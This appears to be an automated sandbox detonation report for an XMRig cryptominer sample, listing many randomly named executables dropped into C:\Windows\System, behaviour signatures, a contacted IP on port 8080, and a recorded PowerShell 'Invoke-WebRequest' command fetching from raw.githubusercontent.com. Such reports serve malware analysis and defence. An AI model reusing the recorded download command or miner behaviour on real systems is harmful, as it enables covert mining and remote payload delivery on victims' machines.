C:\Windows\System\yZtrigD.exe

C:\Windows\System\HTtPHHN.exe

C:\Windows\System\HTtPHHN.exe

C:\Windows\System\hxDpeAz.exe

C:\Windows\System\hxDpeAz.exe

C:\Windows\System\iYXRKIk.exe

C:\Windows\System\iYXRKIk.exe

C:\Windows\System\CzrlbWn.exe

C:\Windows\System\CzrlbWn.exe

C:\Windows\System\MJuwCdJ.exe

C:\Windows\System\MJuwCdJ.exe

C:\Windows\System\ZACaiQt.exe

C:\Windows\System\ZACaiQt.exe

C:\Windows\System\GTqxfgm.exe

C:\Windows\System\GTqxfgm.exe

C:\Windows\System\VMQUJjU.exe

C:\Windows\System\VMQUJjU.exe

C:\Windows\System\IgLBUGa.exe

C:\Windows\System\IgLBUGa.exe

C:\Windows\System\cRrkhwK.exe

C:\Windows\System\cRrkhwK.exe

C:\Windows\System\kCnBAfa.exe

C:\Windows\System\kCnBAfa.exe

C:\Windows\System\uUNuPFD.exe

C:\Windows\System\uUNuPFD.exe

C:\Windows\System\IEmqNFg.exe

C:\Windows\System\IEmqNFg.exe

C:\Windows\System\FEgSeyS.exe

C:\Windows\System\FEgSeyS.exe

C:\Windows\System\TgGqflT.exe

C:\Windows\System\TgGqflT.exe

C:\Windows\System\moYsIEM.exe

C:\Windows\System\moYsIEM.exe

C:\Windows\System\xenmLhi.exe

C:\Windows\System\xenmLhi.exe

C:\Windows\System\GhwVJKk.exe

C:\Windows\System\GhwVJKk.exe

C:\Windows\System\uAAQNpJ.exe

C:\Windows\System\uAAQNpJ.exe

C:\Windows\System\RZvXQkS.exe

C:\Windows\System\RZvXQkS.exe

C:\Windows\System\bVTpSUS.exe

C:\Windows\System\bVTpSUS.exe

C:\Windows\System\tPnTLki.exe

C:\Windows\System\tPnTLki.exe

C:\Windows\System\XVeyOnE.exe

C:\Windows\System\XVeyOnE.exe

C:\Windows\System\PrbaQam.exe

C:\Windows\System\PrbaQam.exe

C:\Windows\System\kRGgtzT.exe

C:\Windows\System\kRGgtzT.exe

C:\Windows\System\dFIbheB.exe

C:\Windows\System\dFIbheB.exe

C:\Windows\System\atXxion.exe

C:\Windows\System\atXxion.exe

C:\Windows\System\UfrEgFA.exe

C:\Windows\System\UfrEgFA.exe

C:\Windows\System\Uumuagl.exe

C:\Windows\System\Uumuagl.exe

C:\Windows\System\kIINImG.exe

C:\Windows\System\kIINImG.exe

C:\Windows\System\hStdMeI.exe

C:\Windows\System\hStdMeI.exe

C:\Windows\System\FhFsBeP.exe

C:\Windows\System\FhFsBeP.exe

C:\Windows\System\YoaECxi.exe

C:\Windows\System\YoaECxi.exe

C:\Windows\System\OnOOioa.exe

C:\Windows\System\OnOOioa.exe

C:\Windows\System\RgPcPGw.exe

C:\Windows\System\RgPcPGw.exe

C:\Windows\System\YFtNifH.exe

C:\Windows\System\YFtNifH.exe

C:\Windows\System\bJKvufM.exe

C:\Windows\System\bJKvufM.exe

C:\Windows\System\cLcKDwU.exe

C:\Windows\System\cLcKDwU.exe

C:\Windows\System\ifHSzaO.exe

C:\Windows\System\ifHSzaO.exe

C:\Windows\System\fJJKSxe.exe

C:\Windows\System\fJJKSxe.exe

C:\Windows\System\aUCkAsE.exe

C:\Windows\System\aUCkAsE.exe

C:\Windows\System\IiAWxOQ.exe

C:\Windows\System\IiAWxOQ.exe

C:\Windows\System\VLytlrL.exe

C:\Windows\System\VLytlrL.exe

C:\Windows\System\CRNGuAn.exe

C:\Windows\System\CRNGuAn.exe

C:\Windows\System\vKaCgLN.exe

C:\Windows\System\vKaCgLN.exe

C:\Windows\System\FDVGlgU.exe

C:\Windows\System\FDVGlgU.exe

C:\Windows\System\RqegCBH.exe

C:\Windows\System\RqegCBH.exe

C:\Windows\System\nopmMUo.exe

C:\Windows\System\nopmMUo.exe

C:\Windows\System\DkkDjWY.exe

C:\Windows\System\DkkDjWY.exe

C:\Windows\System\BLWeohM.exe

C:\Windows\System\BLWeohM.exe

C:\Windows\System\CRsCkOC.exe

C:\Windows\System\CRsCkOC.exe

C:\Windows\System\kBcMgSL.exe

C:\Windows\System\kBcMgSL.exe

C:\Windows\System\leZatJy.exe

C:\Windows\System\leZatJy.exe

C:\Windows\System\UrrEfYB.exe

C:\Windows\System\UrrEfYB.exe

C:\Windows\System\SKHISoS.exe

C:\Windows\System\SKHISoS.exe

C:\Windows\System\auoyqBH.exe

C:\Windows\System\auoyqBH.exe

C:\Windows\System\unjMznu.exe

C:\Windows\System\unjMznu.exe

C:\Windows\System\mdDRGKS.exe

C:\Windows\System\mdDRGKS.exe

C:\Windows\System\rPLUnMY.exe

C:\Windows\System\rPLUnMY.exe

C:\Windows\System\CyGBRUj.exe

C:\Windows\System\CyGBRUj.exe

C:\Windows\System\CkWgSyk.exe

C:\Windows\System\CkWgSyk.exe

C:\Windows\System\YHTqQSk.exe

C:\Windows\System\YHTqQSk.exe

C:\Windows\System\vHoncoS.exe

C:\Windows\System\vHoncoS.exe

C:\Windows\System\KIOuqRp.exe

C:\Windows\System\KIOuqRp.exe

C:\Windows\System\yBsQOEk.exe

C:\Windows\System\yBsQOEk.exe

C:\Windows\System\FdTcpek.exe

C:\Windows\System\FdTcpek.exe

C:\Windows\System\XzSaIgj.exe

C:\Windows\System\XzSaIgj.exe

C:\Windows\System\jCIKqyc.exe

C:\Windows\System\jCIKqyc.exe

C:\Windows\System\DiQpLof.exe

C:\Windows\System\DiQpLof.exe

C:\Windows\System\ktSoIFM.exe

C:\Windows\System\ktSoIFM.exe

C:\Windows\System\mZQBkkv.exe

C:\Windows\System\mZQBkkv.exe

C:\Windows\System\lUWrNDV.exe

C:\Windows\System\lUWrNDV.exe

C:\Windows\System\LYilGTn.exe

C:\Windows\System\LYilGTn.exe

C:\Windows\System\EfdXhae.exe

C:\Windows\System\EfdXhae.exe

C:\Windows\System\HggSgpl.exe

C:\Windows\System\HggSgpl.exe

C:\Windows\System\etLyQzj.exe

C:\Windows\System\etLyQzj.exe

C:\Windows\System\oCBcynS.exe

C:\Windows\System\oCBcynS.exe

C:\Windows\System\DDDDXQz.exe

C:\Windows\System\DDDDXQz.exe

C:\Windows\System\yXWukRM.exe

C:\Windows\System\yXWukRM.exe

C:\Windows\System\wJJjlfz.exe

C:\Windows\System\wJJjlfz.exe

C:\Windows\System\ITatLrq.exe

C:\Windows\System\ITatLrq.exe

C:\Windows\System\KyoyNfd.exe

C:\Windows\System\KyoyNfd.exe

C:\Windows\System\EGcvwPh.exe

C:\Windows\System\EGcvwPh.exe

C:\Windows\System\yyLYPAe.exe

C:\Windows\System\yyLYPAe.exe

C:\Windows\System\xukwPAD.exe

C:\Windows\System\xukwPAD.exe

C:\Windows\System\lszvibL.exe

C:\Windows\System\lszvibL.exe

C:\Windows\System\IRKbWcO.exe

C:\Windows\System\IRKbWcO.exe

C:\Windows\System\nsgQAZH.exe

C:\Windows\System\nsgQAZH.exe

C:\Windows\System\uyHQLlz.exe

C:\Windows\System\uyHQLlz.exe

C:\Windows\System\doedacV.exe

C:\Windows\System\doedacV.exe

C:\Windows\System\zyNnMQT.exe

C:\Windows\System\zyNnMQT.exe

C:\Windows\System\ehbXQGr.exe

C:\Windows\System\ehbXQGr.exe

C:\Windows\System\hnboqoI.exe

C:\Windows\System\hnboqoI.exe

C:\Windows\System\YfkUkbJ.exe

C:\Windows\System\YfkUkbJ.exe

C:\Windows\System\SwrHUFH.exe

C:\Windows\System\SwrHUFH.exe

C:\Windows\System\lpItOMQ.exe

C:\Windows\System\lpItOMQ.exe

C:\Windows\System\CabpwGn.exe

C:\Windows\System\CabpwGn.exe

C:\Windows\System\XerzESU.exe

C:\Windows\System\XerzESU.exe

C:\Windows\System\JzUZNbG.exe

C:\Windows\System\JzUZNbG.exe

C:\Windows\System\LWiQfLI.exe

C:\Windows\System\LWiQfLI.exe

C:\Windows\System\fXSlhPZ.exe

C:\Windows\System\fXSlhPZ.exe

C:\Windows\System\QpreGAs.exe

C:\Windows\System\QpreGAs.exe

C:\Windows\System\esqJmOA.exe

C:\Windows\System\esqJmOA.exe

C:\Windows\System\donMZNB.exe

C:\Windows\System\donMZNB.exe

C:\Windows\System\pOQSwMt.exe

C:\Windows\System\pOQSwMt.exe

C:\Windows\System\oEMmFKI.exe

C:\Windows\System\oEMmFKI.exe

C:\Windows\System\iHGTQwf.exe

C:\Windows\System\iHGTQwf.exe

C:\Windows\System\RWxCLGW.exe

C:\Windows\System\RWxCLGW.exe

C:\Windows\System\kKWPols.exe

C:\Windows\System\kKWPols.exe

C:\Windows\System\KFBSGCP.exe

C:\Windows\System\KFBSGCP.exe

C:\Windows\System\UqwhcbS.exe

C:\Windows\System\UqwhcbS.exe

C:\Windows\System\wmkWLiO.exe

C:\Windows\System\wmkWLiO.exe

C:\Windows\System\pswaKcy.exe

C:\Windows\System\pswaKcy.exe

C:\Windows\System\zWiOXBG.exe

C:\Windows\System\zWiOXBG.exe

C:\Windows\System\TyoFPds.exe

C:\Windows\System\TyoFPds.exe

C:\Windows\System\CHDDNyH.exe

C:\Windows\System\CHDDNyH.exe

C:\Windows\System\jrbGTbi.exe

C:\Windows\System\jrbGTbi.exe

C:\Windows\System\VVWFcqa.exe

C:\Windows\System\VVWFcqa.exe

C:\Windows\System\ANjHJFS.exe

C:\Windows\System\ANjHJFS.exe

C:\Windows\System\UhFzGPB.exe

C:\Windows\System\UhFzGPB.exe

C:\Windows\System\duEOOPC.exe

C:\Windows\System\duEOOPC.exe

C:\Windows\System\zFPQkOe.exe

C:\Windows\System\zFPQkOe.exe

C:\Windows\System\RacxADF.exe

C:\Windows\System\RacxADF.exe

C:\Windows\System\vvooIaw.exe

C:\Windows\System\vvooIaw.exe

C:\Windows\System\JPnAEtt.exe

C:\Windows\System\JPnAEtt.exe

C:\Windows\System\HisKogp.exe

C:\Windows\System\HisKogp.exe

C:\Windows\System\xKoNJog.exe

C:\Windows\System\xKoNJog.exe

C:\Windows\System\ydHIAcV.exe

C:\Windows\System\ydHIAcV.exe

C:\Windows\System\jiKpzOQ.exe

C:\Windows\System\jiKpzOQ.exe

C:\Windows\System\BjRgyvP.exe

C:\Windows\System\BjRgyvP.exe

C:\Windows\System\KRYUaSY.exe

C:\Windows\System\KRYUaSY.exe

Network

Country Destination Domain Proto
DE 3.120.98.217:8080 tcp

Files


Analysis: behavioral2

Detonation Overview

Submitted

2024-05-22 21:01

Reported

2024-05-22 21:03

Platform

win10v2004-20240426-en

Max time kernel

139s

Max time network

119s

Command Line

"C:\Users\Admin\AppData\Local\Temp\3a74c413cf24bab40f56fe140bd9dbe0_NeikiAnalytics.exe"

Signatures

xmrig

miner xmrig

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A raw.githubusercontent.com N/A N/A

Drops file in Windows directory

Description Indicator Process Target

Checks processor information in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 C:\Windows\system32\wermgr.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz C:\Windows\system32\wermgr.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Windows\system32\wermgr.exe N/A

Enumerates system info in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS C:\Windows\system32\wermgr.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU C:\Windows\system32\wermgr.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\3a74c413cf24bab40f56fe140bd9dbe0_NeikiAnalytics.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 704 wrote to memory of 1768 N/A C:\Users\Admin\AppData\Local\Temp\3a74c413cf24bab40f56fe140bd9dbe0_NeikiAnalytics.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Processes

C:\Users\Admin\AppData\Local\Temp\3a74c413cf24bab40f56fe140bd9dbe0_NeikiAnalytics.exe

"C:\Users\Admin\AppData\Local\Temp\3a74c413cf24bab40f56fe140bd9dbe0_NeikiAnalytics.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -command "Invoke-WebRequest "https://raw.githubusercontent.com/" "


C:\Windows\System\AZNLnPl.exe

C:\Windows\System\oNYWkwX.exe

C:\Windows\System\oNYWkwX.exe

C:\Windows\System\ucrGhgE.exe

C:\Windows\System\ucrGhgE.exe

C:\Windows\System\neBBwZW.exe

C:\Windows\System\neBBwZW.exe

C:\Windows\System\fsHBKMG.exe

C:\Windows\System\fsHBKMG.exe

C:\Windows\System\pfvAJYz.exe

C:\Windows\System\pfvAJYz.exe

C:\Windows\System\dEimXiu.exe

C:\Windows\System\dEimXiu.exe

C:\Windows\System\NQyDhsY.exe

C:\Windows\System\NQyDhsY.exe

C:\Windows\System\SObalNN.exe

C:\Windows\System\SObalNN.exe

C:\Windows\System\RaaifgS.exe

C:\Windows\System\RaaifgS.exe

C:\Windows\System\ILOXuSt.exe

C:\Windows\System\ILOXuSt.exe

C:\Windows\System\wtfGhEh.exe

C:\Windows\System\wtfGhEh.exe

C:\Windows\System\dBTrsSU.exe

C:\Windows\System\dBTrsSU.exe

C:\Windows\System\GHmDeyq.exe

C:\Windows\System\GHmDeyq.exe

C:\Windows\System\ADbkonW.exe

C:\Windows\System\ADbkonW.exe

C:\Windows\System\wHmUeTw.exe

C:\Windows\System\wHmUeTw.exe

C:\Windows\System\NtCvHZO.exe

C:\Windows\System\NtCvHZO.exe

C:\Windows\System\tzaFFPK.exe

C:\Windows\System\tzaFFPK.exe

C:\Windows\System\NiJfNwr.exe

C:\Windows\System\NiJfNwr.exe

C:\Windows\System\tYfdfCj.exe

C:\Windows\System\tYfdfCj.exe

C:\Windows\System\azOlWJc.exe

C:\Windows\System\azOlWJc.exe

C:\Windows\System\cSTfioN.exe

C:\Windows\System\cSTfioN.exe

C:\Windows\System\hukODLC.exe

C:\Windows\System\hukODLC.exe

C:\Windows\System\nMQjaDo.exe

C:\Windows\System\nMQjaDo.exe

C:\Windows\System\YCJruFs.exe

C:\Windows\System\YCJruFs.exe

C:\Windows\System\MECkSmL.exe

C:\Windows\System\MECkSmL.exe

C:\Windows\System\DxPINba.exe

C:\Windows\System\DxPINba.exe

C:\Windows\System\gAumOCR.exe

C:\Windows\System\gAumOCR.exe

C:\Windows\System\BChGawb.exe

C:\Windows\System\BChGawb.exe

C:\Windows\System\ZSEcLgf.exe

C:\Windows\System\ZSEcLgf.exe

C:\Windows\System\YzaGDmF.exe

C:\Windows\System\YzaGDmF.exe

C:\Windows\System\pkUUabz.exe

C:\Windows\System\pkUUabz.exe

C:\Windows\System\QhAPclh.exe

C:\Windows\System\QhAPclh.exe

C:\Windows\System\qKuGdFK.exe

C:\Windows\System\qKuGdFK.exe

C:\Windows\System\rBREkFs.exe

C:\Windows\System\rBREkFs.exe

C:\Windows\System\BXTgSLZ.exe

C:\Windows\System\BXTgSLZ.exe

C:\Windows\System\nsydxNW.exe

C:\Windows\System\nsydxNW.exe

C:\Windows\System\aUpGNbM.exe

C:\Windows\System\aUpGNbM.exe

C:\Windows\System\nzzVAHM.exe

C:\Windows\System\nzzVAHM.exe

C:\Windows\System\SIpwUFn.exe

C:\Windows\System\SIpwUFn.exe

C:\Windows\System\GPHISJQ.exe

C:\Windows\System\GPHISJQ.exe

C:\Windows\System\EfuURzP.exe

C:\Windows\System\EfuURzP.exe

C:\Windows\System\ypICOJr.exe

C:\Windows\System\ypICOJr.exe

C:\Windows\System\PXWVbpS.exe

C:\Windows\System\PXWVbpS.exe

C:\Windows\System\AjwDGQR.exe

C:\Windows\System\AjwDGQR.exe

C:\Windows\System\hnjCcbt.exe

C:\Windows\System\hnjCcbt.exe

C:\Windows\System\dXoNLAx.exe

C:\Windows\System\dXoNLAx.exe

C:\Windows\System\pGciPPR.exe

C:\Windows\System\pGciPPR.exe

C:\Windows\System\aKXqKWY.exe

C:\Windows\System\aKXqKWY.exe

C:\Windows\System\bhMiubd.exe

C:\Windows\System\bhMiubd.exe

C:\Windows\System\MshMrHO.exe

C:\Windows\System\MshMrHO.exe

C:\Windows\System\izfyOnp.exe

C:\Windows\System\izfyOnp.exe

C:\Windows\System\DfppdPI.exe

C:\Windows\System\DfppdPI.exe

C:\Windows\System\FGRtfAK.exe

C:\Windows\System\FGRtfAK.exe

C:\Windows\System\WxSFKxF.exe

C:\Windows\System\WxSFKxF.exe

C:\Windows\System\DHrJPwb.exe

C:\Windows\System\DHrJPwb.exe

C:\Windows\System\aDdeMvf.exe

C:\Windows\System\aDdeMvf.exe

C:\Windows\System\pSPXdLx.exe

C:\Windows\System\pSPXdLx.exe

C:\Windows\System\KinBJGH.exe

C:\Windows\System\KinBJGH.exe

C:\Windows\System\rKFBWRY.exe

C:\Windows\System\rKFBWRY.exe

C:\Windows\System\NtNcQUU.exe

C:\Windows\System\NtNcQUU.exe

C:\Windows\System\MhFxHnd.exe

C:\Windows\System\MhFxHnd.exe

C:\Windows\System\Comgpsz.exe

C:\Windows\System\Comgpsz.exe

C:\Windows\System\sHUfbEL.exe

C:\Windows\System\sHUfbEL.exe

C:\Windows\System\ySawWPs.exe

C:\Windows\System\ySawWPs.exe

C:\Windows\System\ImLYEPP.exe

C:\Windows\System\ImLYEPP.exe

C:\Windows\System\AJEQmUy.exe

C:\Windows\System\AJEQmUy.exe

C:\Windows\System\zVaEcli.exe

C:\Windows\System\zVaEcli.exe

C:\Windows\System\oXAFzME.exe

C:\Windows\System\oXAFzME.exe

C:\Windows\System\JChlWSo.exe

C:\Windows\System\JChlWSo.exe

C:\Windows\System\FqDxdDq.exe

C:\Windows\System\FqDxdDq.exe

C:\Windows\System\yEBYkqY.exe

C:\Windows\System\yEBYkqY.exe

C:\Windows\System\egBxYDh.exe

C:\Windows\System\egBxYDh.exe

C:\Windows\System\eAkfnaR.exe

C:\Windows\System\eAkfnaR.exe

C:\Windows\System\AhnSDhc.exe

C:\Windows\System\AhnSDhc.exe

C:\Windows\System\rigeSLJ.exe

C:\Windows\System\rigeSLJ.exe

C:\Windows\System\ofLFJCx.exe

C:\Windows\System\ofLFJCx.exe

C:\Windows\System\hJKtgft.exe

C:\Windows\System\hJKtgft.exe

C:\Windows\System\NUykaJQ.exe

C:\Windows\System\NUykaJQ.exe

C:\Windows\System\btYQtYU.exe

C:\Windows\System\btYQtYU.exe

C:\Windows\System\atUomzD.exe

C:\Windows\System\atUomzD.exe

C:\Windows\System\gUCISCE.exe

C:\Windows\System\gUCISCE.exe

C:\Windows\System\gWspfyk.exe

C:\Windows\System\gWspfyk.exe

C:\Windows\System\NpKzItO.exe

C:\Windows\System\NpKzItO.exe

C:\Windows\System\IEJHNZt.exe

C:\Windows\System\IEJHNZt.exe

C:\Windows\System\kVfPDon.exe

C:\Windows\System\kVfPDon.exe

C:\Windows\System\chCmusq.exe

C:\Windows\System\chCmusq.exe

C:\Windows\System\kzkXufN.exe

C:\Windows\System\kzkXufN.exe

C:\Windows\System\fOgMxEh.exe

C:\Windows\System\fOgMxEh.exe

C:\Windows\System\sDfWKSr.exe

C:\Windows\System\sDfWKSr.exe

C:\Windows\System\wImgzFY.exe

C:\Windows\System\wImgzFY.exe

C:\Windows\System\FkfpSbw.exe

C:\Windows\System\FkfpSbw.exe

C:\Windows\System\UdeZYkJ.exe

C:\Windows\System\UdeZYkJ.exe

C:\Windows\System\MmBllGO.exe

C:\Windows\System\MmBllGO.exe

C:\Windows\System\qbqFaQJ.exe

C:\Windows\System\qbqFaQJ.exe

C:\Windows\System\dfhMbEm.exe

C:\Windows\System\dfhMbEm.exe

C:\Windows\System\cruGePp.exe

C:\Windows\System\cruGePp.exe

C:\Windows\System\PPJYDCP.exe

C:\Windows\System\PPJYDCP.exe

C:\Windows\System\MrvHIXt.exe

C:\Windows\System\MrvHIXt.exe

C:\Windows\System\QHeyito.exe

C:\Windows\System\QHeyito.exe

C:\Windows\System\ktRgvgf.exe

C:\Windows\System\ktRgvgf.exe

C:\Windows\System\xJsQdvO.exe

C:\Windows\System\xJsQdvO.exe

C:\Windows\System\AxTExGk.exe

C:\Windows\System\AxTExGk.exe

C:\Windows\System\dxcGHZV.exe

C:\Windows\System\dxcGHZV.exe

C:\Windows\System\SEAmzMw.exe

C:\Windows\System\SEAmzMw.exe

C:\Windows\System\NrWwuFF.exe

C:\Windows\System\NrWwuFF.exe

C:\Windows\System\KCzJsPO.exe

C:\Windows\System\KCzJsPO.exe

C:\Windows\System\EkLqTZn.exe

C:\Windows\System\EkLqTZn.exe

C:\Windows\System\NtcdNpv.exe

C:\Windows\System\NtcdNpv.exe

C:\Windows\System\dvGMcMj.exe

C:\Windows\System\dvGMcMj.exe

C:\Windows\System\JyVoStp.exe

C:\Windows\System\JyVoStp.exe

C:\Windows\System\ZDKJAcZ.exe

C:\Windows\System\ZDKJAcZ.exe

C:\Windows\System\GjWIBhf.exe

C:\Windows\System\GjWIBhf.exe

C:\Windows\System\MbkOVfr.exe

C:\Windows\System\MbkOVfr.exe

C:\Windows\System\hRYDRIA.exe

C:\Windows\System\hRYDRIA.exe

C:\Windows\System\KqJqYWu.exe

C:\Windows\System\KqJqYWu.exe

C:\Windows\System\leiXErj.exe

C:\Windows\System\leiXErj.exe

C:\Windows\System\DixzAuK.exe

C:\Windows\System\DixzAuK.exe

C:\Windows\System\qUjubTG.exe

C:\Windows\System\qUjubTG.exe

C:\Windows\System\GcXDHCv.exe

C:\Windows\System\GcXDHCv.exe

C:\Windows\System\Krufpqc.exe

C:\Windows\System\Krufpqc.exe

C:\Windows\System\FzvYNXL.exe

C:\Windows\System\FzvYNXL.exe

C:\Windows\System\XfNRwME.exe

C:\Windows\System\XfNRwME.exe

C:\Windows\System\OHAJwHE.exe

C:\Windows\System\OHAJwHE.exe

C:\Windows\System\dxOrjKn.exe

C:\Windows\System\dxOrjKn.exe

C:\Windows\System\mNseapg.exe

C:\Windows\System\mNseapg.exe

C:\Windows\System\jxBBVJq.exe

C:\Windows\System\jxBBVJq.exe

C:\Windows\System\VxovdUy.exe

C:\Windows\System\VxovdUy.exe

C:\Windows\System\UsxsQjG.exe

C:\Windows\System\UsxsQjG.exe

C:\Windows\System\iXGLgYZ.exe

C:\Windows\System\iXGLgYZ.exe

C:\Windows\System\XUSpSEQ.exe

C:\Windows\System\XUSpSEQ.exe

C:\Windows\System\CDLxJSf.exe

C:\Windows\System\CDLxJSf.exe

C:\Windows\System\Fahulek.exe

C:\Windows\System\Fahulek.exe

C:\Windows\System\mMdERDP.exe

C:\Windows\System\mMdERDP.exe

C:\Windows\System\TYrcAWb.exe

C:\Windows\System\TYrcAWb.exe

C:\Windows\System\EpoEGsH.exe

C:\Windows\System\EpoEGsH.exe

C:\Windows\System\WwteyyZ.exe

C:\Windows\System\WwteyyZ.exe

C:\Windows\System\HTdesTG.exe

C:\Windows\System\HTdesTG.exe

C:\Windows\System\sOFYqEp.exe

C:\Windows\System\sOFYqEp.exe

C:\Windows\System\tYBQMkr.exe

C:\Windows\System\tYBQMkr.exe

C:\Windows\System\CWOwjxX.exe

C:\Windows\System\CWOwjxX.exe

C:\Windows\System\ZBgTJYH.exe

C:\Windows\System\ZBgTJYH.exe

C:\Windows\System\BBMZNAg.exe

C:\Windows\System\BBMZNAg.exe

C:\Windows\System\udNCrmU.exe

C:\Windows\System\udNCrmU.exe

C:\Windows\System\xMdIwhn.exe

C:\Windows\System\xMdIwhn.exe

C:\Windows\System\myeIbLb.exe

C:\Windows\System\myeIbLb.exe

C:\Windows\System\bMflUUQ.exe

C:\Windows\System\bMflUUQ.exe

C:\Windows\System\VVZxePi.exe

C:\Windows\System\VVZxePi.exe

C:\Windows\System\NtcXQAv.exe

C:\Windows\System\NtcXQAv.exe

C:\Windows\System\BqwKXQJ.exe

C:\Windows\System\BqwKXQJ.exe

C:\Windows\System\KsLrxDx.exe

C:\Windows\System\KsLrxDx.exe

C:\Windows\System\mtlLFLr.exe

C:\Windows\System\mtlLFLr.exe

C:\Windows\System\aQIkTgq.exe

C:\Windows\System\aQIkTgq.exe

C:\Windows\System\DBhteVQ.exe

C:\Windows\System\DBhteVQ.exe

C:\Windows\System\VJqEsng.exe

C:\Windows\System\VJqEsng.exe

C:\Windows\System\pliqSpZ.exe

C:\Windows\System\pliqSpZ.exe

C:\Windows\System\hECdWmJ.exe

C:\Windows\System\hECdWmJ.exe

C:\Windows\System\DQbppAx.exe

C:\Windows\System\DQbppAx.exe

C:\Windows\System\mObsqQL.exe

C:\Windows\System\mObsqQL.exe

C:\Windows\System\GIzTaxx.exe

C:\Windows\System\GIzTaxx.exe

C:\Windows\System\saSkHlW.exe

C:\Windows\System\saSkHlW.exe

C:\Windows\System\ioUIbUV.exe

C:\Windows\System\ioUIbUV.exe

C:\Windows\System\WTKRYdd.exe

C:\Windows\System\WTKRYdd.exe

C:\Windows\System\jkdlzug.exe

C:\Windows\System\jkdlzug.exe

C:\Windows\System\cOMgShl.exe

C:\Windows\System\cOMgShl.exe

C:\Windows\System\EstZjXE.exe

C:\Windows\System\EstZjXE.exe

C:\Windows\System\MLLpLaC.exe

C:\Windows\System\MLLpLaC.exe

C:\Windows\system32\wermgr.exe

"C:\Windows\system32\wermgr.exe" "-outproc" "0" "1768" "2964" "2896" "2968" "0" "0" "2972" "0" "0" "0" "0" "0"

Network

Files
